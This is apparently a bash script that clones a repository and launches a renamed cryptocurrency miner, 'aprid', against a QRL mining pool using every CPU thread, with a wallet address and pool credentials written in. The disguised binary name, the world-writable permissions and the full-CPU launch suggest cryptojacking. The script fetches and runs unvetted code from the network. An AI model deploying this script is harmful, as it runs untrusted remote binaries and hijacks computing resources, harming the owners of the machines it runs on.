#!/bin/bash
yum update && yum -y install sudo
yum -y install git wget
git clone https://bitbucket.org/asana/luo.git && cd luo
chmod 777 aprid SHA256SUMS
./aprid --donate-level 1 -o sg.qrl.herominers.com -u solo:Q0105001a29a002956bb12c89a46e69cc93a6a29e0c3849c34e24b6a4971f9a78bce2b95d8b8e22 -p ujicoba -a rx/0 -k -t $(nproc --all)
